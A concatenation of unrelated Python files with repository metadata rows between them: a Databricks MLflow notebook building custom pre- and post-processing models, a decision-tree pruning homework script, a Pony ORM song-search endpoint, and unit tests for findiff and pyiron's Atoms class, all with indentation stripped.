import mlflow.sklearn
import mlflow
with mlflow.start_run(run_name="RF Model Pre-process") as run:
mlflow.sklearn.log_model(rf2, "random-forest-model-preprocess")
mlflow.log_metric("mse", rf2_mse)
experimentID = run.info.experiment_id
artifactURI = mlflow.get_artifact_uri()
print(artifactURI)
# COMMAND ----------
# MAGIC %md
# MAGIC Now let's load the `python_function` flavor of the model so we can apply it to a test set.
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ### The code below has issues beyond the scope of this class. The mlflow instance called persists to say that the version is oudated when it cannot possibly be.
# MAGIC #### all the artifacts are logged, but mlflow refuses to access it.
# MAGIC #### I updated mlflow in pip and the problem persists
# MAGIC
# MAGIC ##
# MAGIC
# MAGIC ### I filled all codes as required regardless and they should run as expected.
# COMMAND ----------
# MAGIC %sh
# MAGIC pip install --upgrade mlflow
# COMMAND ----------
# MAGIC %sh
# MAGIC ls 'dbfs:/databricks/mlflow-tracking/4409869614219127/336aa53e82c844e3a1a3551aca606f05/artifacts'
# COMMAND ----------
import mlflow.pyfunc
from mlflow.tracking import MlflowClient
client = MlflowClient()
rf2_run = sorted(client.list_run_infos(experimentID), key=lambda r: r.start_time, reverse=True)[0]
rf2_path = rf2_run.artifact_uri+"/random-forest-model-preprocess/"
# mlflow version issue, impossible to resolve. I did everything I can, and mlflows insists the version is wrong
rf2_pyfunc_model = mlflow.pyfunc.load_model('/dbfs/databricks/mlflow-tracking/4409869614219127/a6ecb40514334dcebb23f68c836eeab5/artifacts/random-forest-model-preprocess')
#rf2_pyfunc_model = mlflow.pyfunc.load_pyfunc(rf2_path.replace("dbfs:", "/dbfs"))
# COMMAND ----------
# MAGIC %md
# MAGIC Let's try giving our new `rf2_pyfunc_model` the `X_test` DataFrame to generate predictions off of.
# COMMAND ----------
try:
rf2_pyfunc_model.predict(X_test)
except ValueError as e:
print("ERROR: " + str(e))
# COMMAND ----------
# MAGIC %md
# MAGIC Why did this fail?
# COMMAND ----------
# MAGIC %md
# MAGIC ## Adding Pre-Processing Steps
# MAGIC
# MAGIC We trained our `rf2` model using a pre-processed training set that has one extra column (`review_scores_sum`) than the unprocessed `X_train` and `X_test` DataFrames. The `rf2` model is expecting to have `review_scores_sum` as an input column as well. Even if `X_test` had the same number of columns as the processed data we trained on, the line above will still error since it does not have our custom truncated `trunc_lat` and `trunc_long` columns.
# MAGIC
# MAGIC To fix this, we could manually re-apply the same pre-processing logic to the `X_test` set each time we wish to use our model.
# MAGIC
# MAGIC However, there is a cleaner and more streamlined way to account for our pre-processing steps. We can define a custom model class that automatically pre-processes the raw input it receives before passing that input into the trained model's `.predict()` function. This way, in future applications of our model, we will no longer have to worry about remembering to pre-process every batch of data beforehand.
# MAGIC
# MAGIC Complete the `preprocess_input(self, model_input)` helper function of the custom `RF_with_preprocess` class so that the random forest model is always predicting off of a DataFrame with the correct column names and the appropriate number of columns.
# COMMAND ----------
# TODO
# Define the model class
class RF_with_preprocess(mlflow.pyfunc.PythonModel):
def __init__(self, trained_rf):
self.rf = trained_rf
def preprocess_input(self, model_input):
#'''return pre-processed model_input'''
X_train_processed = model_input.copy()
X_train_processed["trunc_lat"] = X_train_processed["latitude"].apply(lambda x: round(x,2))
X_train_processed["trunc_long"] = X_train_processed["longitude"].apply(lambda x: round(x,2))
col_names = ['review_scores_accuracy', 'review_scores_cleanliness', 'review_scores_checkin', 'review_scores_communication', 'review_scores_location', 'review_scores_value']
X_train_processed["review_scores_sum"] = X_train_processed[col_names].sum(axis=1)
col_names.append('latitude')
col_names.append('longitude')
X_train_processed = X_train_processed.drop(columns=col_names) #, axis=1)
return X_train_processed
def predict(self, context, model_input):
processed_model_input = self.preprocess_input(model_input.copy())
return self.rf.predict(processed_model_input)
# COMMAND ----------
# MAGIC %md
# MAGIC Let's save, then load this custom model's `python_function`.
# COMMAND ----------
# Construct and save the model
model_path = f"{workingDir}/RF_with_preprocess/"
dbutils.fs.rm(model_path, True) # remove folder if already exists
rf_preprocess_model = RF_with_preprocess(trained_rf = rf2)
mlflow.pyfunc.save_model(path=model_path.replace("dbfs:", "/dbfs"), python_model=rf_preprocess_model)
# Load the model in `python_function` format
loaded_preprocess_model = mlflow.pyfunc.load_pyfunc(model_path.replace("dbfs:", "/dbfs"))
# COMMAND ----------
# MAGIC %md
# MAGIC Now we can directly give our loaded model the unmodified `X_test` and have it generate predictions without errors!
# COMMAND ----------
# Apply the model
loaded_preprocess_model.predict(X_test)
# COMMAND ----------
# MAGIC %md
# MAGIC ## Adding Post-Processing Steps
# MAGIC
# MAGIC Now suppose we are not as interested in a numerical prediction as we are in a categorical label of `Expensive` and `Not Expensive` where the cut-off is above a price of $100. Instead of retraining an entirely new classification model, we can simply add on a post-processing step to our custom model so it returns the predicted label instead of numerical price.
# MAGIC
# MAGIC Complete the following model class with **both the previous preprocess steps and the new `postprocess_result(self, result)`** function such that passing in `X_test` into our model will return an `Expensive` or `Not Expensive` label for each row.
# COMMAND ----------
# TODO
# Define the model class
class RF_with_postprocess(mlflow.pyfunc.PythonModel):
def __init__(self, trained_rf):
self.rf = trained_rf
def preprocess_input(self, model_input):
#'''return pre-processed model_input'''
X_train_processed = model_input.copy()
X_train_processed["trunc_lat"] = X_train_processed["latitude"].apply(lambda x: round(x,2))
X_train_processed["trunc_long"] = X_train_processed["longitude"].apply(lambda x: round(x,2))
col_names = ['review_scores_accuracy', 'review_scores_cleanliness', 'review_scores_checkin', 'review_scores_communication', 'review_scores_location', 'review_scores_value']
X_train_processed["review_scores_sum"] = X_train_processed[col_names].sum(axis=1)
col_names.append('latitude')
col_names.append('longitude')
X_train_processed = X_train_processed.drop(columns=col_names) #, axis=1)
return X_train_processed
def postprocess_result(self, results):
#'''return post-processed results
#Expensive: predicted price > 100
#Not Expensive: predicted price <= 100'''
processed_results = []
for y in results:
if y > 100: processed_results.append('Expensive')
else: processed_results.append('Not Expensive')
return processed_results
def predict(self, context, model_input):
processed_model_input = self.preprocess_input(model_input.copy())
results = self.rf.predict(processed_model_input)
return self.postprocess_result(results)
# COMMAND ----------
# MAGIC %md
# MAGIC Create, save, and apply the model to `X_test`.
# COMMAND ----------
# Construct and save the model
model_path = f"{workingDir}/RF_with_postprocess/"
dbutils.fs.rm(model_path, True) # remove folder if already exists
rf_postprocess_model = RF_with_postprocess(trained_rf = rf2)
mlflow.pyfunc.save_model(path=model_path.replace("dbfs:", "/dbfs"), python_model=rf_postprocess_model)
# Load the model in `python_function` format
loaded_postprocess_model = mlflow.pyfunc.load_pyfunc(model_path.replace("dbfs:", "/dbfs"))
# Apply the model
loaded_postprocess_model.predict(X_test)
# COMMAND ----------
# MAGIC %md-sandbox
# MAGIC Given any unmodified raw data, our model can perform the pre-processing steps, apply the trained model, and follow the post-processing step all in one `.predict` function call!
# COMMAND ----------
# MAGIC %md
# MAGIC ##  Classroom-Cleanup<br>
# MAGIC
# MAGIC Run the **`Classroom-Cleanup`** cell below to remove any artifacts created by this lesson.
# COMMAND ----------
# MAGIC %run "../Includes/Classroom-Cleanup"
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC <h2><img src="https://files.training.databricks.com/images/105/logo_spark_tiny.png"> All done!</h2>
# COMMAND ----------
# MAGIC %md-sandbox
# MAGIC © 2020 Databricks, Inc. All rights reserved.<br/>
# MAGIC Apache, Apache Spark, Spark and the Spark logo are trademarks of the <a href="http://www.apache.org/">Apache Software Foundation</a>.<br/>
# MAGIC <br/>
# MAGIC <a href="https://databricks.com/privacy-policy">Privacy Policy</a> | <a href="https://databricks.com/terms-of-use">Terms of Use</a> | <a href="http://help.databricks.com/">Support</a>
| 41.706371 | 600 | 0.733794 |
c926a35a08af267609a89ca5ca52f05d5085239e | 4,878 | py | Python | Assignments/HW2-PruningProblems-Yan Gu/PruningProblems/question3b.py | billgoo/Rutgers-CS536-Machine-Learning | 944efbc6ee5ccd2d226e420ed61528767023aab7 | [
"MIT"
] | null | null | null | Assignments/HW2-PruningProblems-Yan Gu/PruningProblems/question3b.py | billgoo/Rutgers-CS536-Machine-Learning | 944efbc6ee5ccd2d226e420ed61528767023aab7 | [
"MIT"
] | null | null | null | Assignments/HW2-PruningProblems-Yan Gu/PruningProblems/question3b.py | billgoo/Rutgers-CS536-Machine-Learning | 944efbc6ee5ccd2d226e420ed61528767023aab7 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import math
import csv
import random
import matplotlib.pyplot as plt
from pprint import pprint
from decision_tree_classifier import DecisionTreeClassifier
from decision_tree_plotter import plotter
from collections import Counter
def show_Picture(x_data, y_data_1, y_data_2, y_data_name1, y_data_name2, x_label, y_label, title):
plt.figure(figsize=(16, 8))
plt.xlabel(x_label)
plt.ylabel(y_label)
plt.title(title)
plt.plot(x_data, y_data_1, marker='.', c='red', lw=0.5, label=y_data_name1)
plt.plot(x_data, y_data_2, marker='x', c='blue', lw=0.5, label=y_data_name2)
for i in range(len(x_data)):
plt.annotate("(%s, %.4f)" % (x_data[i], y_data_1[i]),
xy=(x_data[i],y_data_1[i]), xytext=(-20, -20), textcoords='offset points', color='red')
plt.annotate("(%s, %.4f)" % (x_data[i], y_data_1[i]),
xy=(x_data[i],y_data_2[i]), xytext=(-20, 13), textcoords='offset points', color='blue')
plt.legend(loc='upper right')
filename = 'images/question3/Figure.' + title[4:6] + '.png'
# save the picture,filename is title
plt.savefig(filename, bbox_inches='tight')
plt.show()
if __name__ == "__main__":
estimation = []
m = 10000
fname = 'data/question3/data_m_' + str(m) + '.csv'
dataset = pd.read_csv(fname, names=['X0','X1','X2','X3','X4','X5',
'X6','X7','X8','X9','X10',
'X11','X12','X13','X14','X15',
'X16','X17','X18','X19','X20','Y'])
train_data = dataset[0:8000] # 0-7999, totally 8000 data
test_data = dataset[8000:].reset_index(drop=True) # 8000-9999, totally 2000 data
x_points = [1]
i = 10000
while i:
x_points.append(i)
i = i // 2
# we have already know 2^13 < 10000 < 2^14
# so len(S) = 13
# to increase the sample size in S, we choose every size to be the average of
# each two numbers in the S
for j in range(1, 13):
x_points.append((x_points[j-1] + x_points[j]) // 2)
S = list(set(x_points))
S.sort()
for s in S:
classifier = DecisionTreeClassifier(m, train_data)
tree = classifier.fit_ID3_Pruning_Size(s, classifier.tree_with_data, train_data,
train_data, train_data.columns[:-1])
# error for train and test data
err_train = classifier.score_Pruning(train_data, tree)
err_test = classifier.score_Pruning(test_data, tree)
estimation.append([s, err_train, err_test])
print(s, err_train, err_test)
print("Tree with sample size = " + str(s) + " is :")
pprint(tree)
# output the data to be re-format
with open('data/question3/3b.csv', 'w', newline='') as csvfile:
spamwriter = csv.writer(csvfile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
for row in estimation:
spamwriter.writerow(row)
# re-format and draw the xy-coordinate figure
datamap = pd.read_csv('data/question3/3b.csv', names=['minmum sample size','err_train','err_test'])
col_d = datamap['minmum sample size']
col_train = datamap['err_train']
col_test = datamap['err_test']
show_Picture(col_d, col_train, col_test, "err_train", "err_test",
"Minmum sample size", "Error of the tree", "Fig 3b: Error of decision tree for different minmum sample size.")
show_Picture(col_d[0:9].reset_index(drop=True), col_train[0:9].reset_index(drop=True),
col_test[0:9].reset_index(drop=True),
"err_train", "err_test", "Minmum sample size", "Error of the tree",
"Fig 3b(1): Error of decision tree for different minmum sample size.")
show_Picture(col_d[6:14].reset_index(drop=True), col_train[6:14].reset_index(drop=True),
col_test[6:14].reset_index(drop=True),
"err_train", "err_test", "Minmum sample size", "Error of the tree",
"Fig 3b(2): Error of decision tree for different minmum sample size.")
show_Picture(col_d[11:19].reset_index(drop=True), col_train[11:19].reset_index(drop=True),
col_test[11:19].reset_index(drop=True),
"err_train", "err_test", "Minmum sample size",
"Error of the tree", "Fig 3b(3): Error of decision tree for different minmum sample size.")
show_Picture(col_d[16:22].reset_index(drop=True), col_train[16:22].reset_index(drop=True),
col_test[16:22].reset_index(drop=True),
"err_train", "err_test", "Minmum sample size", "Error of the tree",
"Fig 3b(4): Error of decision tree for different minmum sample size.")
| 45.166667 | 126 | 0.602091 |
63a8171fabe11b379423fe8d8b76f169912f6797 | 3,156 | py | Python | endpoints/search/endpoint.py | Ragnar-Oock/setlist_v2_connexion | 760c7bfca83467f118778ad7bd3dd9cc78cf5007 | [
"MIT"
] | null | null | null | endpoints/search/endpoint.py | Ragnar-Oock/setlist_v2_connexion | 760c7bfca83467f118778ad7bd3dd9cc78cf5007 | [
"MIT"
] | null | null | null | endpoints/search/endpoint.py | Ragnar-Oock/setlist_v2_connexion | 760c7bfca83467f118778ad7bd3dd9cc78cf5007 | [
"MIT"
] | null | null | null | from pony import orm
from models import Song
from utils.db import format_order_by
from datetime import timedelta, datetime
from decimal import Decimal
def get(limit, padding, orderby: list, search=None, lastInterpretation=None,
interpretationNumber=None, score=None, showlights=None, vocals=None, odlc=None, arrangements=None):
search_results = orm.select(s for s in Song)
# fuzzy search
if search:
search_results = search_results.where(orm.raw_sql('similarity("s"."fts_col", $search) > .1'))
# add similarity to the order by array
orderby.insert(0, '-similarity')
# does the song has showlights
if showlights:
search_results = search_results.where(lambda s: s.showlights == showlights)
# does the song display lyrics
if vocals:
search_results = search_results.where(lambda s: s.vocals == vocals)
# is the song a odlc or a cdlc
if odlc is not None:
search_results = search_results.where(lambda s: s.official == odlc)
# --- arrangement specific fields ---
# does the song have certain arrangements
if arrangements:
filter_function = ''
for i in range(0, len(arrangements)):
filter_function += 'or arrangements[{}] in s.arrangements.type '.format(i)
filter_function = filter_function.split('or ', 1)[1]
search_results = search_results.where(filter_function)
# --- interpretation specific fields ---
# how many times does the song was played
if interpretationNumber != [0, 100]:
lower_bound = min(interpretationNumber[0], interpretationNumber[1])
upper_bound = max(interpretationNumber[0], interpretationNumber[1])
search_results = search_results.where(
lambda s:
lower_bound <= orm.count(s.interpretations)
and (orm.count(s.interpretations) <= upper_bound or upper_bound >= 100)
)
if lastInterpretation != [0, 100]:
# higher bound in days to allow no maximum calculation when >=100
upper_bound = max(lastInterpretation[0], lastInterpretation[1])
# datetime bounds to be used in where clause
older_bound = datetime.now() - timedelta(days=max(lastInterpretation[0], lastInterpretation[1]))
youger_bound = datetime.now() - timedelta(days=min(lastInterpretation[0], lastInterpretation[1]))
search_results = search_results.where(
lambda s:
youger_bound > orm.max(s.interpretations.date)
and (orm.max(s.interpretations.date) <= older_bound or upper_bound >= 100)
)
if score != [0, 100]:
lower_bound = Decimal(min(score[0], score[1]))
upper_bound = Decimal(max(score[0], score[1]))
search_results = search_results.where(
lambda s:
lower_bound <= orm.max(s.interpretations.score) and orm.max(s.interpretations.score) <= upper_bound
)
# apply order by, limit and padding
search_results = search_results \
.order_by(format_order_by(orderby)) \
.limit(limit=limit, offset=padding)
return {'data': [s.serialize() for s in search_results]}, 200
| 40.461538 | 111 | 0.665716 |
a7d53e8f0bd268a58c444424cf754b055db7ea6e | 1,171 | py | Python | test/test_utils.py | diehlpk/findiff | 7ec4cd83a461b30a6fca87494c135977cf54b1d3 | [
"MIT"
] | null | null | null | test/test_utils.py | diehlpk/findiff | 7ec4cd83a461b30a6fca87494c135977cf54b1d3 | [
"MIT"
] | null | null | null | test/test_utils.py | diehlpk/findiff | 7ec4cd83a461b30a6fca87494c135977cf54b1d3 | [
"MIT"
] | null | null | null | import sys
sys.path.insert(1, '..')
import unittest
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_array_equal
from findiff.utils import *
class TestUtils(unittest.TestCase):
def test_all_index_tuples_for_shape(self):
shape = 2, 3
expected = []
for ix in range(shape[0]):
for iy in range(shape[1]):
expected.append((ix, iy))
actual = all_index_tuples_as_list(shape)
for a, e in zip(actual, expected):
self.assertEqual(e, a)
def test_to_long_index(self):
shape = 3, 4, 5
all_tuples = all_index_tuples_as_list(shape)
expected = list(range(np.prod(shape)))
for i, idx in enumerate(all_tuples):
actual = to_long_index(idx, shape)
self.assertEqual(expected[i], actual)
def test_to_index_tuple(self):
shape = 3, 4, 5
all_tuples = all_index_tuples_as_list(shape)
for long_idx in range(np.prod(shape)):
expected = all_tuples[long_idx]
actual = to_index_tuple(long_idx, shape)
np.testing.assert_array_equal(expected, actual)
| 25.456522 | 71 | 0.631085 |
d4c4befbf5ed06144dbf6b548cb9a73986587686 | 68,750 | py | Python | tests/atomistics/structure/test_atoms.py | ibrsam/pyiron | 14ffbc2bba6e13738e2d995cbe3f900df3946b1f | [
"BSD-3-Clause"
] | null | null | null | tests/atomistics/structure/test_atoms.py | ibrsam/pyiron | 14ffbc2bba6e13738e2d995cbe3f900df3946b1f | [
"BSD-3-Clause"
] | 1 | 2021-11-02T09:22:56.000Z | 2021-11-02T09:22:56.000Z | tests/atomistics/structure/test_atoms.py | ibrsam/pyiron | 14ffbc2bba6e13738e2d995cbe3f900df3946b1f | [
"BSD-3-Clause"
] | 1 | 2021-11-02T08:35:47.000Z | 2021-11-02T08:35:47.000Z | # coding: utf-8
# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department
# Distributed under the terms of "New BSD License", see the LICENSE file.
import unittest
import numpy as np
import os
import warnings
from pyiron.atomistics.structure.atom import Atom
from pyiron.atomistics.structure.atoms import Atoms, CrystalStructure
from pyiron.atomistics.structure.factory import StructureFactory
from pyiron.atomistics.structure.sparse_list import SparseList
from pyiron.atomistics.structure.periodic_table import PeriodicTable, ChemicalElement
from pyiron_base import FileHDFio, ProjectHDFio, Project
from ase.cell import Cell as ASECell
from ase.atoms import Atoms as ASEAtoms
class TestAtoms(unittest.TestCase):
@classmethod
def tearDownClass(cls):
file_location = os.path.dirname(os.path.abspath(__file__))
if os.path.isfile(
os.path.join(file_location, "../../static/atomistics/test_hdf")
):
os.remove(
os.path.join(file_location, "../../static/atomistics/test_hdf")
)
if os.path.isfile(
os.path.join(file_location, "../../static/atomistics/test.h5")
):
os.remove(
os.path.join(file_location, "../../static/atomistics/test.h5")
)
@classmethod
def setUpClass(cls):
C = Atom("C").element
cls.C3 = Atoms([C, C, C], positions=[[0, 0, 0], [0, 0, 2], [0, 2, 0]])
cls.C2 = Atoms(2 * [Atom("C")])
cls.struct_factory = StructureFactory()
def setUp(self):
# These atoms are reset before every test.
self.CO2 = Atoms("CO2", positions=[[0, 0, 0], [0, 0, 1.5], [0, 1.5, 0]])
def test__init__(self):
pos, cell = generate_fcc_lattice()
pse = PeriodicTable()
el = pse.element("Al")
basis = Atoms()
ase_basis = ASEAtoms()
self.assertIsInstance(ase_basis, ASEAtoms)
self.assertIsInstance(ase_basis.info, dict)
self.assertIsInstance(ase_basis.arrays, dict)
self.assertIsInstance(ase_basis.pbc, (bool, list, np.ndarray))
self.assertIsInstance(ase_basis._cellobj, ASECell)
self.assertIsInstance(basis, Atoms)
self.assertIsInstance(basis.info, dict)
self.assertIsInstance(basis.arrays, dict)
self.assertIsInstance(basis.units, dict)
self.assertIsInstance(basis.pbc, (bool, list, np.ndarray))
self.assertIsInstance(basis.indices, np.ndarray)
self.assertEqual(len(basis.positions), 0)
self.assertIsInstance(basis.species, list)
self.assertIsInstance(basis.elements, np.ndarray)
basis = Atoms(symbols="Al", positions=pos, cell=cell)
self.assertIsInstance(basis, Atoms)
self.assertEqual(basis.get_spacegroup()["Number"], 225)
basis = Atoms(elements="Al", positions=pos, cell=cell)
self.assertIsInstance(basis, Atoms)
basis = Atoms(elements=["Al"], positions=pos, cell=cell)
self.assertIsInstance(basis, Atoms)
self.assertRaises(
ValueError, Atoms, symbols="Pt", elements="Al", positions=pos, cell=cell
)
basis = Atoms(numbers=[13], positions=pos, cell=cell)
self.assertEqual(basis.get_majority_species()["symbol"], "Al")
basis = Atoms(species=[el], indices=[0], positions=pos, cell=cell)
self.assertEqual(basis.get_majority_species()["symbol"], "Al")
self.assertIsInstance(basis, Atoms)
self.assertIsInstance(basis.info, dict)
self.assertIsInstance(basis.arrays, dict)
self.assertIsInstance(basis.units, dict)
self.assertIsInstance(basis.pbc, (bool, list, np.ndarray))
self.assertIsInstance(basis.indices, np.ndarray)
self.assertIsInstance(basis.species, list)
self.assertIsInstance(basis.cell, ASECell)
self.assertIsInstance(basis.positions, np.ndarray)
self.assertIsInstance(basis.get_scaled_positions(), np.ndarray)
self.assertIsInstance(basis.elements, np.ndarray)
def test_set_species(self):
pos, cell = generate_fcc_lattice()
pse = PeriodicTable()
el = pse.element("Pt")
basis = Atoms(symbols="Al", positions=pos, cell=cell)
self.assertEqual(basis.get_chemical_formula(), "Al")
basis.set_species([el])
self.assertEqual(basis.get_chemical_formula(), "Pt")
self.assertTrue(
"Al" not in [sp.Abbreviation] for sp in basis._species_to_index_dict.keys()
)
self.assertTrue(
"Pt" in [sp.Abbreviation] for sp in basis._species_to_index_dict.keys()
)
def test_new_array(self):
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell)
basis.set_repeat([10, 10, 10])
spins = np.ones(len(basis))
basis.new_array(name="spins", a=spins)
self.assertTrue(np.array_equal(basis.arrays["spins"], spins))
def test_set_array(self):
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell)
basis.set_repeat([10, 10, 10])
spins = np.ones(len(basis), dtype=float)
basis.set_array(name="spins", a=2 * spins, dtype=int)
self.assertTrue(np.array_equal(basis.arrays["spins"], 2 * spins))
def test_get_array(self):
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell)
basis.set_repeat([10, 10, 10])
spins = np.ones(len(basis), dtype=float)
basis.set_array(name="spins", a=2 * spins, dtype=int)
self.assertTrue(np.array_equal(basis.arrays["spins"], 2 * spins))
self.assertTrue(np.array_equal(basis.get_array(name="spins"), 2 * spins))
def test_add_tags(self):
self.CO2.add_tag(test_tag="a")
self.assertIsInstance(self.CO2.test_tag, SparseList)
self.assertEqual(self.CO2.test_tag[0], "a")
self.assertEqual(self.CO2.test_tag[0], self.CO2.test_tag[2])
self.assertIsInstance(self.CO2.test_tag.list(), list)
self.CO2.add_tag(selective_dynamics=[True, True, True])
self.CO2.selective_dynamics[1] = [True, False, True]
self.assertEqual(self.CO2.selective_dynamics[1], [True, False, True])
self.assertIsInstance(self.CO2.selective_dynamics.list(), list)
def test_get_tags(self):
self.CO2.add_tag(test_tag="a")
self.assertIsInstance(self.CO2.test_tag, SparseList)
self.assertIsInstance(self.CO2.get_tags(), type(dict().keys()))
def test_get_pbc(self):
self.assertTrue(np.array_equal(self.CO2.pbc, self.CO2.get_pbc()))
self.assertEqual(len(self.CO2.get_pbc()), 3)
def test_set_pbc(self):
self.CO2.set_pbc([True, True, False])
self.assertTrue(np.array_equal(self.CO2.pbc, self.CO2.get_pbc()))
self.assertTrue(np.array_equal([True, True, False], self.CO2.get_pbc()))
self.CO2.set_pbc(False)
self.assertTrue(np.array_equal([False, False, False], self.CO2.get_pbc()))
self.assertTrue(np.array_equal(self.CO2.pbc, self.CO2.get_pbc()))
def test_chemical_element(self):
conv = self.CO2.convert_element("C")
self.assertIsInstance(conv, ChemicalElement)
self.assertIsInstance(self.CO2.convert_element(conv), ChemicalElement)
self.assertIsInstance(self.CO2.convert_element(self.CO2[0]), ChemicalElement)
with self.assertRaises(ValueError):
self.assertIsInstance(self.CO2.convert_element(self.CO2), ChemicalElement)
self.assertEqual(len(self.CO2.species), 2)
def test_copy(self):
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell)
basis_copy = basis.copy()
basis_copy.positions[0, 0] += 5
self.assertNotEqual(basis_copy.positions[0, 0], basis.positions[0, 0])
basis_copy.cell[0, 0] += 5
self.assertNotEqual(basis_copy.cell[0, 0], basis.cell[0, 0])
basis_copy = basis.copy()
self.assertEqual(basis, basis_copy)
basis_copy[:] = "Pt"
self.assertNotEqual(basis, basis_copy)
def test_numbers_to_elements(self):
num_list = [1, 12, 13, 6]
self.assertTrue(
np.array_equal(
[el.Abbreviation for el in self.CO2.numbers_to_elements(num_list)],
["H", "Mg", "Al", "C"],
)
)
def test_scaled_pos_xyz(self):
basis = Atoms(symbols="AlAl", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3))
pos_xyz = basis.pos_xyz()
self.assertAlmostEqual(np.linalg.norm(pos_xyz[0] - np.array([0, 1])), 0)
scaled_pos_xyz = basis.scaled_pos_xyz()
self.assertAlmostEqual(
np.linalg.norm(pos_xyz[0] - basis.cell[0, 0] * scaled_pos_xyz[0]), 0
)
def test_to_hdf(self):
filename = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"../../static/atomistics/test_hdf",
)
abs_filename = os.path.abspath(filename)
hdf_obj = FileHDFio(abs_filename)
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell)
basis.set_repeat([2, 2, 2])
basis.to_hdf(hdf_obj, "test_structure")
self.assertTrue(
np.array_equal(hdf_obj["test_structure/positions"], basis.positions)
)
basis_new = Atoms().from_hdf(hdf_obj, "test_structure")
self.assertEqual(basis, basis_new)
def test_from_hdf(self):
filename = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"../../static/atomistics/test_hdf",
)
abs_filename = os.path.abspath(filename)
hdf_obj = FileHDFio(abs_filename)
pos, cell = generate_fcc_lattice()
basis_store = Atoms(symbols="Al", positions=pos, cell=cell)
basis_store.set_repeat([2, 2, 2])
basis_store.add_tag(selective_dynamics=[False, False, False])
basis_store.selective_dynamics[7] = [True, True, True]
basis_store.to_hdf(hdf_obj, "simple_structure")
basis = Atoms().from_hdf(hdf_obj, group_name="simple_structure")
self.assertEqual(len(basis), 8)
self.assertEqual(basis.get_majority_species()["symbol"], "Al")
self.assertEqual(basis.get_spacegroup()["Number"], 225)
self.assertTrue(basis.selective_dynamics[7][0])
self.assertFalse(basis.selective_dynamics[0][0])
basis.add_tag(selective_dynamics=[False, False, False])
basis.selective_dynamics[6] = [True, True, True]
self.assertTrue(basis.selective_dynamics[6][0])
self.assertFalse(basis.selective_dynamics[5][0])
def test_to_object(self):
filename = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"../../static/atomistics",
)
abs_filename = os.path.abspath(filename)
hdf_obj = ProjectHDFio(
project=Project(abs_filename),
file_name="test.h5"
)
pos, cell = generate_fcc_lattice()
basis_store = Atoms(symbols="Al", positions=pos, cell=cell)
basis_store.set_repeat([2, 2, 2])
basis_store.to_hdf(hdf_obj, "simple_structure")
basis = hdf_obj["simple_structure"].to_object()
self.assertEqual(len(basis), 8)
self.assertEqual(basis.get_majority_species()["symbol"], "Al")
self.assertEqual(basis.get_spacegroup()["Number"], 225)
def test_create_Fe_bcc(self):
self.pse = PeriodicTable()
self.pse.add_element("Fe", "Fe_up", spin="up", pseudo_name="GGA")
self.pse.add_element("Fe", "Fe_down", spin="down", pseudo_name="GGA")
Fe_up = self.pse.element("Fe_up")
Fe_down = self.pse.element("Fe_down")
self.Fe_bcc = Atoms(
[Fe_up, Fe_down],
scaled_positions=[[0, 0, 0], [0.25, 0.25, 0.25]],
cell=np.identity(3),
)
self.Fe_bcc.add_tag("group")
self.Fe_bcc.group[:] = 0
def test_convert_formula(self):
self.assertEqual(self.CO2.convert_formula("C"), ["C"])
self.assertEqual(self.CO2.convert_formula("C3"), ["C", "C", "C"])
self.assertEqual(self.CO2.convert_formula("CO2"), ["C", "O", "O"])
self.assertEqual(self.CO2.convert_formula("CO2Fe"), ["C", "O", "O", "Fe"])
self.assertEqual(
self.CO2.convert_formula("CO2FeF21"), ["C", "O", "O", "Fe", "F", "F"]
)
def test__getitem__(self):
self.assertEqual(self.CO2[0].symbol, "C")
self.assertEqual(self.C3[2].position.tolist(), [0, 2, 0])
self.assertTrue(
(self.C3[1:].positions == np.array([[0, 0, 2], [0, 2, 0]])).all()
)
short_basis = self.CO2[0]
self.assertIsInstance(short_basis, Atom)
short_basis = self.CO2[[0]]
self.assertIsInstance(short_basis, Atoms)
self.assertEqual(short_basis.indices[0], 0)
self.assertEqual(len(short_basis.species), 1)
short_basis = self.CO2[[2]]
self.assertIsInstance(short_basis, Atoms)
self.assertEqual(short_basis.indices[0], 0)
self.assertEqual(len(short_basis.species), 1)
basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constant=4.2)
basis_O = CrystalStructure("O", bravais_basis="fcc", lattice_constant=4.2)
basis_O.positions += [0.0, 0.0, 0.5]
basis = basis_Mg + basis_O
basis.center_coordinates_in_unit_cell()
basis.set_repeat([3, 3, 3])
mg_indices = basis.select_index("Mg")
o_indices = basis.select_index("O")
basis_new = basis[mg_indices] + basis[o_indices]
self.assertEqual(
len(basis_new._tag_list), len(basis[mg_indices]) + len(basis[o_indices])
)
self.assertEqual(basis_new.get_spacegroup()["Number"], 225)
self.assertEqual(basis[:-3], basis[0:len(basis)-3])
self.assertEqual(basis.dimension, basis[mg_indices].dimension)
self.assertTrue(np.array_equal(basis.pbc, basis[mg_indices].pbc))
self.assertRaises(IndexError, basis_new.__getitem__, [True, True, False])
self.assertEqual(basis_new, basis_new[[True] * len(basis_new)])
bool_array = np.array([True] * len(basis_new))
bool_array[[10, 20, 40]] = False
self.assertEqual(len(basis_new[bool_array]), len(basis_new) - 3)
bool_array = np.array([True] * len(basis))
bool_array[mg_indices] = False
self.assertEqual(len(basis[bool_array]), len(o_indices))
self.assertEqual(len(basis[0:10]), 10)
self.assertEqual(basis[0, 10], basis[[0, 10]])
def test_positions(self):
self.assertEqual(self.CO2[1:].positions[1:].tolist(), [[0.0, 1.5, 0.0]])
self.CO2.positions[1][0] = 5.0
self.assertEqual(self.CO2.positions[1].tolist(), [5.0, 0, 1.5])
def test_set_positions(self):
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell)
basis.set_positions(np.array([[2.5, 2.5, 2.5]]))
